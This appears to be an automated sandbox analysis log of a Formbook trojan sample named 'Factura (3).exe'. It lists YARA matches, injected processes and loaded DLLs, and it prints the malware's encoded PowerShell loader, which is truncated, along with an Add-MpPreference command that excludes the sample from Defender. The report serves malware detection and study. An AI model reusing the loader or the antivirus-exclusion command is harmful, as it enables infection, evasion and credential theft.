            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0541E8F023_2_0541E8F0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053F38E023_2_053F38E0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AAB4023_2_054AAB40
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AFB7623_2_054AFB76
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A6BD723_2_054A6BD7
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0542DBF923_2_0542DBF9
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0540FB8023_2_0540FB80
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054AFA4923_2_054AFA49
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_054A7A4623_2_054A7A46
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05463A6C23_2_05463A6C
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0549DAC623_2_0549DAC6
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_053EEA8023_2_053EEA80
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_05435AA023_2_05435AA0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0548DAAC23_2_0548DAAC
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0076111023_2_00761110
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_007511A423_2_007511A4
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0075C34023_2_0075C340
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0075C56023_2_0075C560
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0075A5E023_2_0075A5E0
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_0075A5D723_2_0075A5D7
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00779B5023_2_00779B50
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00762C3023_2_00762C30
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 23_2_00762C2B23_2_00762C2B
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0545EA12 appears 84 times
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 0546F290 appears 105 times
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 053DB970 appears 266 times
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 05425130 appears 36 times
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: String function: 05437E54 appears 87 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 0541EA12 appears 86 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 053F7E54 appears 88 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 0539B970 appears 268 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 0542F290 appears 105 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 053E5130 appears 36 times
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7492 -s 2236
            Source: 14.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 14.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000017.00000002.3762446362.0000000000750000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.1567061985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000017.00000002.3763198467.0000000004C60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000018.00000002.3767966509.0000000005690000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.1567476017.0000000004EA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000017.00000002.3763434495.0000000004CA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000014.00000002.3765581887.00000000059F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.1574530292.0000000007EC0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: powershell.exe, 00000009.00000002.1606616466.000001CE29EE0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F1E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1606616466.000001CE29F04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@17/15@15/9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7492
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7744:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7408:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7504:120:WilError_03
            Source: C:\Users\user\Desktop\Factura (3).exeFile created: C:\Users\user\AppData\Local\Temp\file-22993.putikJump to behavior
            Source: Factura (3).exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ParentProcessId FROM Win32_Process WHERE ProcessId = 7492
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT ParentProcessId FROM Win32_Process WHERE ProcessId = 7492
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Factura (3).exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: chkdsk.exe, 00000017.00000002.3764249613.0000000004FD8000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000003.1751891987.0000000004FD8000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3764249613.0000000005004000.00000004.00000020.00020000.00000000.sdmp, chkdsk.exe, 00000017.00000002.3764249613.0000000004FE1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Factura (3).exeReversingLabs: Detection: 34%
            Source: unknownProcess created: C:\Users\user\Desktop\Factura (3).exe "C:\Users\user\Desktop\Factura (3).exe"
            Source: C:\Users\user\Desktop\Factura (3).exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Factura (3).exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkABIEQAQ1BDwENQQ9BD0EMARPBB8EMAQ/BDoEMAQgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJAAoBDAEMQQ7BD4EPQQgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAEgRABDUEPAQ1BD0EPQQwBE8EHwQwBD8EOgQwBCAALQBGAGkAbAB0AGUAcgAgACQAKAQwBDEEOwQ+BD0EIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAHsACgAgACAAIAAgAHAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAGgQ7BE4ERwQsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABgEPQQ4BEYEOAQwBDsEOAQ3BDgEQARDBE4ESQQ4BDkEEgQ1BDoEQgQ+BEAELAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAAUBDAEPQQ9BEsENQQKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBdADoAOgBDAHIAZQBhAHQAZQAoACkACgAgACAAIAAgACQAKAQ4BEQEQAQwBEIEPgRABC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BCAAPQAgACQAKAQ4BEQEQAQwBEIEPgRABC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkABoEOwROBEcELAAgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQpAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQgAD0AIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAFAQwBD0EPQRLBDUELAAgADAALAAgACQAFAQwBD0EPQRLBDUELgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQKAH0ACgAKACQAGgQ7BE4ERwQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA1ADAALAAgADAAeABCADAALAAgADAAeAA1AEIALAAgADAAeAAzAEQALAAgADAAeAA3ADEALAAgADAAeAA4ADAALAAgADAAeABBADcALAAgADAAeABEAEMALAAgADAAeABBADgALAAgADAAeAA1AEMALAAgADAAeAAyADYALAAgADAAeAA5AEEALAAgADAAeAA3AEIALAAgADAAeAA5ADIALAAgADAAeABEAEQALAAgADAAeABFADcALAAgADAAeAA3ADYALAAgADAAeABEADAALAAgADAAeABDAEYALAAgADAAeAA0ADIALAAgADAAeAA5ADAALAAgADAAeABCAEIALAAgADAAeAA2AEYALAAgADAAeAA1AEYALAAgADAAeABDADQALAAgADAAeABCADgALAAgADAAeAAxAEQALAAgADAAeABBADYALAAgADAAeABCAEUALAAgADAAeABFADQALAAgADAAeAA2AEMALAAgADAAeAAzADUAKQAKACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFADcALAAgADAAeAA5ADkALAAgADAAeAAyADEALAAgADAAeAAyADcALAAgADAAeAA1AEEALAAgADAAeAAyAEQALAAgADAAeAAzADEALAAgADAAeAA1ADMALAAgADAAeAAwAEUALAAgADA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7492 -s 2236
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Factura (3).exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkABIEQAQ1BDwENQQ9BD0EMARPBB8EMAQ/BDoEMAQgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABUAGUAbQBwAFAAYQB0AGgAKAApAAoAJAAoBDAEMQQ7BD4EPQQgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAB8EPgRBBDsENQQ0BD0EOAQ5BCQEMAQ5BDsEIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAEgRABDUEPAQ1BD0EPQQwBE8EHwQwBD8EOgQwBCAALQBGAGkAbAB0AGUAcgAgACQAKAQwBDEEOwQ+BD0EIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIAAgBDAEQQRIBDgERARABD4EMgQwBEIETAQgAHsACgAgACAAIAAgAHAAYQByAGEAbQAgACgACgAgACAAIAAgACAAIAAgACAAWwBiAHkAdABlAFsAXQBdACQAGgQ7BE4ERwQsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABgEPQQ4BEYEOAQwBDsEOAQ3BDgEQARDBE4ESQQ4BDkEEgQ1BDoEQgQ+BEAELAAKACAAIAAgACAAIAAgACAAIABbAGIAeQB0AGUAWwBdAF0AJAAUBDAEPQQ9BEsENQQKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBdADoAOgBDAHIAZQBhAHQAZQAoACkACgAgACAAIAAgACQAKAQ4BEQEQAQwBEIEPgRABC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAAoAIAAgACAAIAAkACgEOAREBEAEMARCBD4EQAQuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BCAAPQAgACQAKAQ4BEQEQAQwBEIEPgRABC4AQwByAGUAYQB0AGUARABlAGMAcgB5AHAAdABvAHIAKAAkABoEOwROBEcELAAgACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQpAAoAIAAgACAAIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQgAD0AIAAkACAEMARBBEgEOAREBEAEPgQyBEkEOAQ6BC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAFAQwBD0EPQRLBDUELAAgADAALAAgACQAFAQwBD0EPQRLBDUELgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkACAEMARBBEgEOAREBEAEPgQyBDAEPQQ9BEsENQQUBDAEPQQ9BEsENQQKAH0ACgAKACQAGgQ7BE4ERwQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeAA1ADAALAAgADAAeABCADAALAAgADAAeAA1AEIALAAgADAAeAAzAEQALAAgADAAeAA3ADEALAAgADAAeAA4ADAALAAgADAAeABBADcALAAgADAAeABEAEMALAAgADAAeABBADgALAAgADAAeAA1AEMALAAgADAAeAAyADYALAAgADAAeAA5AEEALAAgADAAeAA3AEIALAAgADAAeAA5ADIALAAgADAAeABEAEQALAAgADAAeABFADcALAAgADAAeAA3ADYALAAgADAAeABEADAALAAgADAAeABDAEYALAAgADAAeAA0ADIALAAgADAAeAA5ADAALAAgADAAeABCAEIALAAgADAAeAA2AEYALAAgADAAeAA1AEYALAAgADAAeABDADQALAAgADAAeABCADgALAAgADAAeAAxAEQALAAgADAAeABBADYALAAgADAAeABCAEUALAAgADAAeABFADQALAAgADAAeAA2AEMALAAgADAAeAAzADUAKQAKACQAGAQ9BDgERgQ4BDAEOwQ4BDcEOARABEMETgRJBDgEOQQSBDUEOgRCBD4EQAQgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFADcALAAgADAAeAA5ADkALAAgADAAeAAyADEALAAgADAAeAAyADcALAAgADAAeAA1AEEALAAgADAAeAAyAEQALAAgADAAeAAzADEALAAgADAAeAA1ADMALAAgADAAeAAwAEUALAAgADAJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Factura (3).exe" -ForceJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\calc.exe "C:\Windows\System32\calc.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
            Source: C:\Program Files (x86)\pIMpitAZqKZfeRCOXcQATdJpZunqtwcykqYxFSHiFpLgkyjNuFL\KAnMKAQhHABqpRuDRpLtww.exeProcess created: C:\Windows\SysWOW64\chkdsk.exe "C:\Windows\SysWOW64\chkdsk.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Factura (3).exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Factura (3).exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
